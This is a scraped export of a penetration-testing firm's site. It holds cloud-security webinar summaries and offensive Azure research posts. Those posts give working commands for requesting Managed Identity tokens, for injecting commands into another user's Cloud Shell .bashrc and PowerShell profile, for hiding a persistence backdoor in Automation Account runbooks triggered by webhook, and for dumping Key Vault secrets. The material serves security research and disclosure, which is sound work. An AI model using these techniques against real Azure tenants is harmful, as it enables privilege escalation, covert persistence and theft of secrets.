How You Can Protect Yourself 

Given the challenges related to cloud security, it’s important for organizations to understand how to protect against risks. A key to effective cloud security is to shift the mindset away from thinking that the cloud is the same or similar to traditional infrastructure.  

As more breaches happen across organizations, this mindset is changing and security teams are thinking more about cloud-centric activities like conducting risk assessments of cloud infrastructure, establishing recurring processes and methodologies, and adopting and documenting cloud security control checklists. 

Some steps organizations and security teams can take to protect cloud assets include:  

  • Practice proper cloud hygiene  
    • Define requirements 
    • Isolate your development, staging, and production environments 
    • Limit privileges in all environments 
  • Test regularly and fully 
    • Penetration test all the layers of your environment 
    • Utilize cloud configuration reviews  

How Cloud Penetration Testing Differs from External Network Penetration Testing 

Compared to External Network Penetration Testing (the more traditional environment review), a Cloud Penetration Test focuses on the standard issues we're going to look for on any cloud service. 

While many penetration deliverables are applicable to both external and cloud pentesting, some additional deliverables specific to cloud penetration testing include:

  • Network penetration testing includes internal network layer testing of all virtual machines and services from the cloud virtual networks, along with external network layer testing of externally exposed sources   
  • Configuration of cloud services: review of firewall rules, IAM/RBAC, review of users/roles/groups/policies, review of utilized cloud services (including but not limited to, servers, databases, and serverless computing) 

Are you getting the most out of your penetration testing reports? See our Penetration Testing Report Example to double check. 

Recommendations for Cloud Testing 

For cloud testing to be effective, companies and security teams need to take a proactive role in understanding the full scope of their cloud environments and the services or applications they have, and ensuring systems and services within these cloud environments are being updated.  

Once you have a grasp on the full scope of your cloud environment, some best practices for cloud testing include:

  • Ensure systems and services are updated and patched in accordance with industry/vendor recommendations 
  • Verify IAM/RBAC roles are assigned appropriately 
  • Utilize security groups and firewall rules to limit access between services and virtual machines 
  • Ensure that sensitive information is not written in cleartext to any cloud services, and encrypt data prior to storage 
  • Verify user permissions for any cloud storage containing sensitive data and ensure that the rules represent only the users who require access to the storage 
  • Ensure only the appropriate parties have access to key material for decryption purposes 

Protect Your Assets with NetSPI’s Cloud Penetration Testing  

Whether your company is at the early stages of talking about moving to the cloud, already in the cloud—or at any stage in between—prioritizing cloud security is critical to protecting your cloud assets. 

NetSPI’s Cloud Penetration Testing services can help your business identify vulnerabilities in your AWS, Azure, or GCP cloud infrastructure, reduce organizational risk, and improve cloud security. Our expert cloud pentesters follow manual and automated penetration testing processes and focus on Configuration Review, External Network Cloud Pentesting, and Internal Network Pentesting.  

Learn more about NetSPI’s Cloud Penetration Testing Services to schedule a demo to discuss in more detail.

[wonderplugin_video iframe="https://youtu.be/l3OAJyauhBA" lightbox=0 lightboxsize=1 lightboxwidth=1200 lightboxheight=674.999999999999916 autoopen=0 autoopendelay=0 autoclose=0 lightboxtitle="" lightboxgroup="" lightboxshownavigation=0 showimage="" lightboxoptions="" videowidth=1200 videoheight=674.999999999999916 keepaspectratio=1 autoplay=0 loop=0 videocss="position:relative;display:block;background-color:#000;overflow:hidden;max-width:100%;margin:0 auto;" playbutton="https://www.netspi.com/wp-content/plugins/wonderplugin-video-embed/engine/playvideo-64-64-0.png"]

[post_title] => Best Practices to Protect Your Organization's Cloud Assets [post_excerpt] => Nearly every organization is talking about moving to the Cloud, developing a strategy to move to the Cloud, moving to the Cloud, or already all in on the Cloud. Join two of NetSPI’s cloud security experts, Practice Director Karl Fosaaen and CISO/Managing Director Bill Carver to learn if your cloud assets are as protected as you think. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => best-practices-to-protect-your-organizations-cloud-assets [to_ping] => [pinged] => [post_modified] => 2024-01-15 14:11:26 [post_modified_gmt] => 2024-01-15 20:11:26 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=17411 [menu_order] => 81 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [32] => WP_Post Object ( [ID] => 17432 [post_author] => 53 [post_date] => 2020-02-21 14:14:45 [post_date_gmt] => 2020-02-21 14:14:45 [post_content] =>
Watch Now

Overview  

When businesses migrate anything to a cloud infrastructure, penetration testers often find several common security gaps. In this webinar, one of NetSPI's cloud security experts, VP of Research Karl Fosaaen, will discuss four common cloud security problems. He’ll also cover how Cloud Penetration Testing can help make your cloud security testing program more effective.

Key highlights: 

What is the Cloud?  

There tends to be a lot of confusion as to what qualifies something in the cloud, and similarly, many different ways to look at the cloud. One of the most important things to understand is the primary cloud hosting services.

The most common cloud hosting services include:

Common Issues with Cloud Security

When data is stored in the cloud, some common issues emerge. The top issues with cloud security include:

1. Data Exposure 

AWS has made headlines because of misconfiguration issues that resulted in credential data or personal information being exposed on the internet unintentionally. All cloud providers are at risk of similar issues. Data exposure is one of the most common challenges cloud pentesters see.  

2. Access Key Exposure 

To access a cloud service, users typically use some type of key, whether for storage services, or SSH keys to get into virtual machines. If attackers find the key, they can gain access to the cloud environment, systems, and sensitive data stored in the cloud.   

3. Privilege Issues 

Each cloud platform has individual user and rights management within the platform. One of the common issues that pentesters run into is that a user may be given excessive rights or privileges to systems that they weren't intended to have access to. 

4. Entry Points to the Internal Network 

Cloud pentesters are frequently seeing that the internal network is becoming more and more integrated with the cloud network via VPN connections. If one of these virtual machines out in the cloud is compromised, an attacker may be able to pivot back to the internal corporate network, and gain access that wasn't necessarily intended through the cloud.

How to Prevent Common Cloud Security Issues 

Businesses can take a few different approaches to assess the security of their cloud environment. One option is integrating cloud service testing into traditional network and application pentesting programs. 

However, for any business hosting applications in the cloud, it's recommended to perform cloud penetration testing specifically. Beyond traditional penetration testing, dedicated cloud penetration testing focuses on the overall cloud infrastructure, rather than treating the cloud as an auxiliary to normal pentesting services. 

NetSPI’s comprehensive Cloud Penetration Testing services follow manual and automated pentesting processes to identify vulnerabilities in AWS, Azure, and GCP cloud infrastructure and can guide your team on how to improve cloud security.  

Get started with enhancing your cloud security posture — learn more about NetSPI’s Cloud Penetration Testing Services.

[wonderplugin_video iframe="https://youtu.be/ffBcIkjumBc" lightbox=0 lightboxsize=1 lightboxwidth=1200 lightboxheight=674.999999999999916 autoopen=0 autoopendelay=0 autoclose=0 lightboxtitle="" lightboxgroup="" lightboxshownavigation=0 showimage="" lightboxoptions="" videowidth=1200 videoheight=674.999999999999916 keepaspectratio=1 autoplay=0 loop=0 videocss="position:relative;display:block;background-color:#000;overflow:hidden;max-width:100%;margin:0 auto;" playbutton="https://www.netspi.com/wp-content/plugins/wonderplugin-video-embed/engine/playvideo-64-64-0.png"]

[post_title] => Intro to Cloud Penetration Testing [post_excerpt] => Experts in pen testing cloud apps & infrastructure for vulnerabilities & misconfiguration. Learn about cloud pen testing and common cloud security gaps in this video now. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => intro-to-cloud-penetration-testing [to_ping] => [pinged] => [post_modified] => 2024-01-15 14:09:48 [post_modified_gmt] => 2024-01-15 20:09:48 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=17432 [menu_order] => 83 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [33] => WP_Post Object ( [ID] => 11234 [post_author] => 10 [post_date] => 2020-02-20 07:00:37 [post_date_gmt] => 2020-02-20 07:00:37 [post_content] =>

Azure Managed Identities are Azure AD objects that allow Azure virtual machines to act as users in an Azure subscription. While this may sound like a bad idea, AWS utilizes IAM instance profiles for EC2 and Lambda execution roles to accomplish very similar results, so it's not an uncommon practice across cloud providers. In my experience, they are not as commonly used as AWS EC2 roles, but Azure Managed Identities may be a potential option for privilege escalation in an Azure subscription.

TL;DR - Managed Identities on Azure VMs can be given excessive Azure permissions. Access to these VMs could lead to privilege escalation.

Much like other Azure AD objects, these managed identities can be granted IAM permissions for specific resources in the subscription (storage accounts, databases, etc.) or they can be given subscription level permissions (Reader, Contributor, Owner). If the identity is given a role (Contributor, Owner, etc.) or privileges higher than those granted to the users with access to the VM, users should be able to escalate privileges from the virtual machine.


Important note: Anyone with command execution rights on a Virtual Machine (VM), that has a Managed Identity, can execute commands as that managed identity from the VM.

Here are some potential scenarios that could result in command execution rights on an Azure VM:

Identifying Managed Identities

In the Azure portal, there are a couple of different places where you will be able to identify managed identities. The first option is the Virtual Machine section. Under each VM, there will be an "Identity" tab that will show the status of that VM's managed identity.


Alternatively, you will be able to note managed identities in any Access Control (IAM) tabs where a managed identity has rights. In this example, the MGITest identity has Owner rights on the resource in question (a subscription).


From the AZ CLI - AzureAD User

To identify managed identities as an authenticated AzureAD user on the CLI, I normally get a list of the VMs (az vm list) and pipe that into the command to show identities.

Here's the full one-liner that I use (in an authenticated AZ CLI session) to identify managed identities in a subscription.

(az vm list | ConvertFrom-Json) | ForEach-Object {$_.name;(az vm identity show --resource-group $_.resourceGroup --name $_.name | ConvertFrom-Json)}

Since the principalId (a GUID) isn't the easiest thing to use to identify the specific managed identity, I print the VM name ($_.name) first to help figure out which VM (MGITest) owns the identity.


From the AZ CLI - On the VM

Let's assume that you have a session (RDP, PS Remoting, etc.) on the Azure VM and you want to check if the VM has a managed identity. If the AZ CLI is installed, you can use the "az login --identity" command to authenticate as the VM to the CLI. If this is successful, you have confirmed that you have access to a Managed Identity.

From here, your best bet is to list out your permissions for the current subscription:

az role assignment list --assignee ((az account list | ConvertFrom-Json).id)

Alternatively, you can enumerate through other resources in the subscription and check your rights on those IDs/Resource Groups/etc:

az resource list

az role assignment list --scope "/subscriptions/SUB_ID_GOES_HERE/PATH_TO_RESOURCE_GROUP/OR_RESOURCE_PATH"

From the Azure Metadata Service

If you don't have the AZ CLI on the VM that you have access to, you can still use PowerShell to make calls out to the Azure AD OAuth token service to get a token to use with the Azure REST APIs. While it's not as handy as the AZ CLI, it may be your only option.

To do this, invoke a web request to 169.254.169.254 for the oauth2 API with the following command:

Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -Method GET -Headers @{Metadata="true"} -UseBasicParsing

If this returns an actual token, then you have a Managed Identity to work with. This token can then be used with the REST APIs to take actions in Azure. A simple proof of concept for this is included in the demo section below.
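The same metadata-service call can be made from any language on the VM; here is a minimal Python equivalent that just builds the request. Note that the endpoint is plain HTTP (it never leaves the VM) and the Metadata: true header is mandatory or the service refuses the request. Sending it is left commented out, since it only works from inside an Azure VM.

```python
import json
import urllib.request

# The instance metadata service token endpoint, as used in the
# Invoke-WebRequest call above.
IMDS_URL = ("http://169.254.169.254/metadata/identity/oauth2/token"
            "?api-version=2018-02-01&resource=https://management.azure.com/")

req = urllib.request.Request(IMDS_URL, headers={"Metadata": "true"})

# On an Azure VM with a managed identity, sending the request returns JSON
# containing an access_token field:
# token = json.load(urllib.request.urlopen(req))["access_token"]
```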

You can think of this method as similar to gathering AWS credentials from the metadata service from an EC2 host. Plenty has been written on that subject, but here's a good primer blog for further reading.

Limitations

Microsoft does limit the specific services that accept managed identities as authentication - Microsoft Documentation Page

Due to the current service limitations, the escalation options can be a bit limited, but you should have some options.

Privilege Escalation

Once we have access to a Managed Identity, and have confirmed the rights of that identity, then we can start escalating our privileges. Below are a few scenarios (descending by level of permissions) that you may find yourself in with a Managed Identity.

  • Identity is a Subscription Owner
    • Add a guest account to the subscription
      • Add that guest as an Owner
    • Add an existing domain user to the subscription as an Owner
      • See the demo below
  • Identity is a Subscription Contributor
    • Virtual Machine Lateral Movement
      • Managed Identity can execute commands on other VMs via the Azure CLI or APIs
    • Storage Account Access
    • Configuration Access
  • Identity has rights to other subscriptions
    • Pivot to other subscription, evaluate permissions
  • Identity has access to Key Vaults
  • Identity is a Subscription Reader
    • Subscription Information Enumeration
      • List out available resources, users, etc for further use in privilege escalation

For more information on Azure privilege escalation techniques, check out my DerbyCon 9 talk:

Secondary Access Scenarios

You may not always have direct command execution on a virtual machine, but you may be able to indirectly run commands via Automation Account Runbooks.

I have seen subscriptions where a user does not have contributor (or command execution) rights on a VM, but they have Runbook creation and run rights on an Automation account. This automation account has subscription contributor rights, which allows the lesser privileged user to run commands on the VM through the Runbook. While this in itself is a privilege inheritance issue (See previous Key Vault blog), it can be abused by the previously outlined process to escalate privileges on the subscription.

Proof of Concept Code

Below is a basic PowerShell proof of concept that uses the Azure REST APIs to add a specific user to the subscription Owners group using a Managed Identity.

Proof of Concept Code Sample

All the code is commented, but the overall script process is as follows:

  1. Query the metadata service for the subscription ID
  2. Request an OAuth token from the metadata service
  3. Query the REST APIs for a list of roles, and find the subscription "Owner" GUID
  4. Add a specific user (see below) to the subscription "Owners" IAM role

The provided code sample can be modified (See: "CHANGE-ME-TO-AN-ID") to add a specific ID to the subscription Owners group.

While this is a little difficult to demo, we can see in the screenshot below that a new principal ID (starting with 64) was added to the Owners group as part of the script execution.


2/25/20 - Update:

I created a secondary PoC function that will probably be more practical for everyday use. The function uses the same methods to get a token, but it uses the REST APIs to list out all of the available storage account keys. So if you have access to an Azure VM that is configured with Contributor or Storage Account Contributor, you should be able to list out all of the keys. These keys can then be used (See Azure Storage Explorer) to remotely access the storage accounts and give you further access to the subscription.

You can find the sample code here - get-MIStorageKeys.ps1

Conclusion

I have been in a fair number of Azure environments and can say that managed identities are not heavily used. But if a VM is configured with an overly permissive Managed Identity, this might be a handy way to escalate. I have actually seen this exact scenario (Managed Identity as an Owner) in a client environment, so it does happen.

From a permissions management perspective, you may have a valid reason for using managed identities, but double check how this identity might be misused by anyone with access (intentional or not) to the system.

[post_title] => Azure Privilege Escalation Using Managed Identities [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => azure-privilege-escalation-using-managed-identities [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:58:33 [post_modified_gmt] => 2021-06-08 21:58:33 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11234 [menu_order] => 528 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [34] => WP_Post Object ( [ID] => 11179 [post_author] => 10 [post_date] => 2019-12-10 07:00:04 [post_date_gmt] => 2019-12-10 07:00:04 [post_content] => TLDR; By default, Azure Subscription Contributors have access to all storage accounts in a subscription. These storage accounts can contain Azure Cloud Shell storage files (Linux home directories) that can contain sensitive information. By modifying these Cloud Shell files, an attacker can execute commands in the Cloud Shell sessions of other users. This can lead to cross-account command execution and privilege escalation.

Intro

The Azure Cloud Shell (Bash or PowerShell) can be a handy way to manage Azure resources, but it can also be a potential source of sensitive data and privilege escalation during a penetration test. Azure Cloud Shell allows users to manage resources in Azure from "anywhere": shell.azure.com, the Azure mobile app, and the (new-ish and pretty fantastic) Microsoft Terminal application. I haven't really found a practical way to use the Cloud Shell from the mobile app yet, but it's an option.

In order to maintain a consistent experience from wherever/whenever you log in, the Cloud Shell service keeps files in an Azure Storage account in your subscription. The Cloud Shell will be configured with a storage account of your choosing, and the actual files will be under the File Share service for that storage account. If you're using a storage account that was automatically generated from the Cloud Shell defaults, it will most likely be prefaced with "cs".

For more info on how Azure Cloud Shell persists files, check out this Microsoft documentation - https://docs.microsoft.com/en-us/azure/cloud-shell/persisting-shell-storage

What Can We Do With Cloud Shell Files?

Let's say that we've compromised an Azure AD account that has rights to read/write Cloud Shell File Shares. Usually this will be a Contributor account on the subscription, but you may run into a user that has contributor rights specific to Storage Accounts.

Important note: By default, all subscription Contributor accounts will have read/write access to all subscription Storage Accounts, unless otherwise restricted.

With this access, you should be able to download any available files in the Cloud Shell directory, including the acc_ACCT.img file (where ACCT is a name - see above: acc_john.img). If there are multiple users with Cloud Shell instances in the same Storage Account, there will be multiple folders in the Storage Account. As an attacker, choose the account that you would like to attack (john) and download the IMG file for that account. This file is usually 5 GB, so it may take a minute to download.

The IMG file is an EXT2 file system, so you can easily mount it on a Linux machine. Once mounted on your Linux machine, there are two paths that we can focus on.

Information Disclosure

If the Cloud Shell was used for any real work (not just accidentally opened once...), there is a chance that the user operating the shell made some mistakes in their commands. If those mistakes were made with any of the Azure PowerShell cmdlets, the resulting error logs end up in the .Azure (note the capital A) folder in the IMG file system. The New-AzVM cmdlet is particularly vulnerable here, as it can end up logging credentials for the local administrator accounts of new virtual machines. In this case, we tried to create a VM with a non-compliant name. This caused an error which resulted in the "Cleartext?" password being logged.
PS Azure:> grep -b5 -a5 Password .Azure/ErrorRecords/New-AzVM_2019-10-18-T21-39-25-103.log
103341-      }
103349-    },
103356-    "osProfile": {
103375-      "computerName": "asdfghjkllkjhgfdasqweryuioasdgkjalsdfjksasdf",
103445-      "adminUsername": "netspi",
103478:      "adminPassword": "Cleartext?",
103515-      "windowsConfiguration": {}
103548-    },
103555-    "networkProfile": {
103579-      "networkInterfaces": [
103608-        {
If you’re parsing Cloud Shell IMG files, make sure that you look at the .Azure/ErrorRecords files for any sensitive information, as you might find something useful. Additionally, any of the command history files may have some interesting information:
  • .bash_history
  • .local/share/powershell/PSReadLine/ConsoleHost_history.txt

Cross-Account Command Execution

Let's assume that you've compromised the "Bob" account in an Azure subscription. Bob is a Contributor on the subscription and shares the subscription with the "Alice" account. Alice is the owner of the subscription and a Global Administrator for the Azure tenant. Alice is a Cloud Shell power user and has an instance on the subscription that Bob works on.

Since Bob is a Contributor in the subscription, he has the rights (by default) to download any Cloud Shell .IMG file, including Alice's acc_alice.img. Once downloaded, Bob mounts the IMG file in a Linux system (mount acc_alice.img /mnt/) and appends any commands that he would like to run to the following two files:
  • .bashrc
  • /home/alice/.config/PowerShell/Microsoft.PowerShell_profile.ps1
We'll download MicroBurst to the Cloud Shell as a proof of concept:
$ echo 'wget https://github.com/NetSPI/MicroBurst/archive/master.zip' >> .bashrc
$ echo 'wget https://github.com/NetSPI/MicroBurst/archive/master.zip' >> /home/alice/.config/PowerShell/Microsoft.PowerShell_profile.ps1
Once Bob has added his attacking commands (see suggested commands below), he unmounts the IMG file and uploads it back to the Azure Storage Account. When you upload the file, make sure that you select the “Overwrite if files already exist” box. When the upload has completed, the Cloud Shell environment is ready for the attack. The next Cloud Shell instance launched by the Alice account (from that subscription) will run the appended commands under the context of the Alice account. Note that this same attack could potentially be accomplished by mounting the file share in an Azure Linux VM instead of downloading, modifying, and uploading the file.
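The mount-and-append step can be sketched as follows. This assumes the IMG is already mounted; /tmp/mnt is a hypothetical stand-in for the real mount point, and the payload is the MicroBurst download from the example above:

```shell
# Hypothetical mount point standing in for "mount acc_alice.img /mnt/"
MNT=/tmp/mnt/home/alice
mkdir -p "$MNT/.config/PowerShell"

# Append the payload to both startup files so it fires whether the victim
# launches a Bash or a PowerShell Cloud Shell
PAYLOAD='wget https://github.com/NetSPI/MicroBurst/archive/master.zip'
echo "$PAYLOAD" >> "$MNT/.bashrc"
echo "$PAYLOAD" >> "$MNT/.config/PowerShell/Microsoft.PowerShell_profile.ps1"
```

After this, the IMG would be unmounted and uploaded back to the Storage Account as described.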

Example:

In this example, we've just modified both files to echo "Hello World" as a proof of concept. By modifying both the .bashrc and PowerShell profile files, we have also ensured that our commands will run regardless of which type of Cloud Shell is selected. At this point, your options for command execution are endless, but I'd suggest using this to add your current user as a more privileged user (Owner) on the current subscription, or on other subscriptions in the tenant that your victim user has access to. If you're unsure which subscriptions your victim user has access to, take a look at the .azure/azureProfile.json file in their Cloud Shell directory. Finally, if your target user isn't making use of a Cloud Shell during your engagement, a well-placed phishing email with a link to https://shell.azure.com/ could be used to get a user to initiate a Cloud Shell session.
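Enumerating the victim's subscriptions from that profile file is a one-liner. A sketch with a fabricated azureProfile.json (the subscription ID and name below are made up; the JSON shape mirrors what the Azure CLI writes):

```shell
# Fabricated Cloud Shell home directory and profile file for illustration
mkdir -p /tmp/cs_victim/.azure
cat > /tmp/cs_victim/.azure/azureProfile.json <<'EOF'
{"subscriptions":[{"id":"00000000-0000-0000-0000-000000000000","name":"Example Subscription","state":"Enabled"}]}
EOF

# Pull out the subscription names the victim account can reach
grep -o '"name":"[^"]*"' /tmp/cs_victim/.azure/azureProfile.json
```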

MSRC Disclosure Timeline

Both of these issues (Info Disclosure and Privilege Escalation) were submitted to MSRC:
  • 10/21/19 – VULN-011207 and VULN-011212 created and assigned case numbers
  • 10/25/19 - Privilege Elevation issue (VULN-011212) status changed to "Complete"
    • MSRC Response: "Based on our understanding of your report, this is expected behavior. Allowing a user access to storage is the equivalent of allowing access to a home directory. In this case, we are giving end users the ability to control access to storage accounts and file shares. End users should only grant access to trusted users."
  • 10/28/19 - Additional Context sent to MSRC to clarify the standard Storage Account permissions
  • 11/1/19 - Information Disclosure issue (VULN-011207) status changed to "Complete"
    • Truncated MSRC Response: "The engineering team has reviewed your findings, and we have determined that this is the current designed behavior for logging. While this specific logging ability is not described well in our documentation, there is some guidance around storage account creation to limit who has access to the log files - https://docs.microsoft.com/en-us/azure/cloud-shell/persisting-shell-storage#create-new-storage.
      In the future, the team is considering the option of adding more detail into the documentation to describe the scenario you reported along with guidance on protecting access to log files. They are also looking into additional protections that can be added into Cloud Shell as new features to better restrict access or obfuscate entries that may contain secrets."
  • 12/4/19 - Cloud Shell privilege escalation issue (VULN-011212) status changed to "Complete"
Special thanks go out to one of our NetSPI security consultants, Jake Karnes, who was really helpful in testing out the Storage Account Contributor rights and who patiently waited for the upload/download of the 5 GB IMG test files.

(Originally published as "Azure Privilege Escalation via Cloud Shell"; last modified 2022-01-20.)

Maintaining Azure Persistence via Automation Accounts

In every penetration test that involves Azure, we want to escalate our privileges up to Global Administrator of the tenant. Once we've escalated our privileges in an Azure tenant, we want the ability to maintain our access to each subscription and to the tenant as a whole. Aside from the benefits of controlling the Azure tenant, it can be really handy to have an Azure backdoor that could (potentially) be used to pivot back into the main AD environment. After escalating privileges in the Azure tenant, we can make use of Automation Runbooks to persist in the Azure environment. There are multiple ways to persist in Azure, but for this post we will focus on Automation Accounts that are configured with excessive privileges, automation runbooks, and webhook triggers, which together will allow us to regain access to an Azure environment with a single POST request.

TLDR

Want to maintain privileges in Azure? Add an Automation Account with excessive privileges that can be used to add new accounts (with Subscription Owner permissions) to AzureAD via a single POST request.

Potential Persistence Scenario

For the purposes of this blog, imagine this fairly standard Azure attack life cycle:
  1. Attacker compromises an Azure account/system
  2. Attacker escalates Azure privileges up to Global Administrator
  3. Blue team revokes initial access and/or Global Administrator access
In this type of scenario, we will want to have some type of persistence option available to re-enable our access into a tenant. Based on my experience, Automation Accounts typically fly under the radar. If they are set up properly, they can be used to regain Owner (or higher*) permissions on subscriptions in the Azure tenant with a new AzureAD account. Since newly created Azure accounts are more likely to get noticed, they should be used for short-term access, while the Automation Account acts as the long-haul persistence account. Automation Accounts can also be configured for password access or cert-based authentication, so those can also be options for getting back into the subscription.

General Process:

  1. Create a new Automation Account
  2. Import a new runbook that creates an AzureAD user with Owner permissions for the subscription*
    1. Sample runbook for this Blog located here - https://github.com/NetSPI/MicroBurst
  3. Add the AzureAD module to the Automation account
    1. Update the Azure Automation Modules
  4. Assign "User Administrator" and "Subscription Owner" rights to the automation account
  5. Add a webhook to the runbook
  6. Eventually lose your access...
  7. Trigger the webhook with a post request to create the new user
*This runbook could be modified to run as a Global Administrator that creates a new Global Administrator, but that's really noisy. Let me know if you do this; I'd be interested to see how well it works. I realize this is a bit of legwork just to maintain persistence. The eventual goal is to automate this process with some PowerShell and integrate it with the existing MicroBurst tools.

Creating the Automation Account

Navigate to the "Automation Accounts" section of the Azure portal and create a new automation account. Naming it something basic, like BackupAutomationProcess, should avoid raising too much suspicion. Make sure that you set "Create Azure Run As account" to Yes, as this will be needed to run the backdoor runbook code. If you want to blend in with the default runbooks, the imported runbook name should follow the same naming strategy as the tutorials (AzureAutomationTutorial*). If you follow this naming convention, you will want to import and publish your malicious runbook into the account as soon as possible; the closer its timestamp is to the tutorial runbooks, the less suspicious it will be. Can you tell which of these runbooks is the malicious one? Once imported, you will also need to publish the runbook, which will then allow you to set a webhook for remote triggering of the runbook. To set the webhook, go to the Webhooks tab under the runbook. Depending on how long your operation is running, you may want to set your expiration date far off in the future to protect your ability to trigger the webhook. Important step - copy the webhook URL and keep it for when you need to trigger your backdoor.

Module Maintenance

Since the AzureAD module is not standard for Automation Accounts, you will need to import it into your account. Go to the Modules tab for the Automation Account and use the "Browse Gallery" feature to find the "AzureAD" module. Import it into your account and wait a few (5-10) minutes for it to deploy. The modules can sometimes take a while to populate to the Automation Accounts, so be patient. Additionally, your Automation Account may not play nicely with the current/old version of the AzureRM modules. I don't really know why this is still an issue for Azure, but you may need to update your Azure Automation modules. This can be done with this runbook - https://aka.ms/UpdateModulesRunbookGitHub Since we're using a new Automation Account, the updates shouldn't cause any issues with existing runbooks. Alternatively, if you're using an existing Automation Account for all of this, updating the modules could cause compatibility issues with existing runbooks. You would also need to assign the additional rights to the existing Automation Account, which is what we will cover next.

Setting Automation Account Rights

Once the Automation Account is configured and the webhook is set, the account will need the proper rights to add a new user and give it Owner rights on the subscription. To add these rights, navigate to the Azure Active Directory tab with a tenant admin account and open the "Roles and Administrators" section. Within that section, open the "User Administrator" role and add the Automation Account to the group. The Automation Account will be labeled with the name of the account and a base64 string appended at the end. Given that this username may stick out against the other users in the group, you may want to rename the Automation Account. This can be done in the AzureAD -> App Registrations section, under "Branding". After adding User Administrator rights, the Automation Account user will need to be added as an Owner on the subscription. This can be done through the Subscriptions tab: select the subscription that you want to persist in, go to the Access Control (IAM) tab, and add the Owner role assignment to your Automation Account. This will also take a few minutes to populate, so give it a little while before you actually try to trigger the webhook.

Triggering the Webhook

Let's say that after escalating privileges and setting a persistence backdoor, the compromised tenant admin account gets flagged, and now you're locked out. Using the webhook URL from the earlier steps and the example caller function below, you can now create a new subscription Owner account (BlogDemoUser / Password123) for yourself in Azure.
$uri = "https://s15events.azure-automation.net/webhooks?token=h6[REDACTED]%3d"
$AccountInfo = @(@{RequestBody=@{Username="BlogDemoUser";Password="Password123"}})
$body = ConvertTo-Json -InputObject $AccountInfo
$response = Invoke-WebRequest -Method Post -Uri $uri -Body $body
This process may take a minute, as the runbook job will need to spool up, but after it has completed, you should have a newly minted subscription Owner account.
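The same trigger works from any HTTP client; all the webhook needs is a POST with that JSON body. A sketch that builds a roughly equivalent body and stages it for curl (the webhook URL is a placeholder, so the actual POST is left commented out):

```shell
# Placeholder URL; substitute the webhook URL copied when the webhook was created
WEBHOOK='https://s15events.azure-automation.net/webhooks?token=[REDACTED]'

# Roughly the JSON that ConvertTo-Json produces for the PowerShell example above
BODY='[{"RequestBody":{"Username":"BlogDemoUser","Password":"Password123"}}]'
printf '%s' "$BODY" > /tmp/webhook_body.json

# Uncomment to fire the webhook for real:
# curl -s -X POST --data @/tmp/webhook_body.json "$WEBHOOK"
```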

Potential Concerns and Detection Techniques

While this process can be somewhat quiet in the right environment, it may be fairly obvious in the wrong one. A couple of things to keep in mind:
  • Creating a new AzureAD user could/should trigger an alert
  • Creating a new Automation Account could/should trigger an alert
  • Adding a user to the User Administrators and Owners groups could/should trigger an alert
Since the Automation Accounts section is not typically on an Azure user's portal dashboard, an attacker may be able to hide out for a while in an automation account.

(Originally published as "Maintaining Azure Persistence via Automation Accounts", 2019-09-12.)

Using Azure Automation Accounts to Access Key Vaults

This is the second post in a series of blogs that focuses on Azure Automation. Check out "Exporting Azure RunAs Certificates for Persistence" for more info on how authentication works for Automation Accounts. In this installment, we're going to focus on making use of Automation Accounts to gain access to sensitive data stored in Key Vaults. High-level TLDR:
  1. Gain access to an AzureAD account that has rights to create/modify/run automation runbooks in existing Automation Accounts
    1. This AzureAD account doesn't have access to any Key Vaults, but you want to read the vaults
  2. Access an Automation Account configured with rights to read keys from a Key Vault
  3. Add (or modify) a runbook for the Automation Account to access the Key Vault and dump the secrets
  4. Use your newfound secrets for further pivoting in the environment
I have been frequently running into situations where I have contributor access to a subscription, but I'm unable to access the data in the Azure Key Vaults. Since I can't grant myself access to the vaults (requires Owner rights), I've had to come up with some creative ways for accessing the Key Vaults with Contributor accounts.

Initial Access

Most of the time that we have access to a Contributor account in Azure, the account does not have access to any of the Key Vaults in the subscription. Security-conscious developers/engineers will limit the rights for normal users and assign application-specific accounts to handle accessing Key Vaults. This limits the liability put on user accounts and keeps the secrets with the application service accounts. While we may not have access to the Key Vaults, we do have Contributor rights on the Automation Account runbooks. This grants us the rights to create/modify/run automation runbooks for the existing Automation Accounts, which allows us to run code as automation users that may have rights to access Key Vaults. So why does this happen? As a best practice for automating specific tasks within Azure, engineers may vault keys/credentials that are used by automation runbooks. The Automation Accounts are then granted access to the Key Vaults to make use of the keys/credentials as part of the automation process, which helps abstract the credentials away from the runbook code and the users. Common automation Key Vault applications:
  • Keys for encrypting data in an application
  • Local administrator passwords for VMs
  • SQL database credentials for accessing AzureSQL databases
  • Access key storage for other Azure services
As a side note: Azure developers/engineers are getting better at making use of Key Vaults for automation credentials, but we still occasionally see credentials that are hard-coded in runbooks. If you have read access on runbooks, keep an eye out for hard-coded credentials.

Creating a New Runbook

In order to access the Key Vaults from the Automation Accounts, we will need to create a new runbook that lists out each of the vaults and all of the keys for each vault. We will then run this runbook with the RunAs account, along with any credentials configured for the account. So far, this shotgun approach has been the easiest way to enumerate key values in a vault, but it's not the most opsec-friendly method. In many of the environments that I've seen, there are specific alerting rules already set up for unauthorized access attempts to Key Vaults, so be careful when you're doing this. It has been a little difficult trying to come up with a method for determining automation user access before running a runbook in the Automation Account. There's no way to grab cleartext automation credentials from an Automation Account without running a runbook, and it's a little tricky (but possible) to get the Key Vault rights for RunAs accounts before running a runbook. In the grand scheme of things, you will need to run a runbook to pull the keys, so you might as well go for all the keys at once. If you want to be more careful with the Automation Accounts that you use for this attack, keep an eye out for runbooks that have code to specifically read from Key Vaults. Chances are good that those accounts have access to one or more vaults. You can also choose the specific Automation Accounts that you want to use in the following script.

Automating the Process

At a high level, here's what we will accomplish with the "Get-AzureKeyVaults-Automation" PowerShell function:
  1. List the Automation Accounts
    1. Select the Automation Accounts that you want to use
  2. Iterate through the list and run a standardized runbook in each selected account (with a randomized job name)
    1. List all of the Key Vaults
    2. Attempt to read every key with the current account
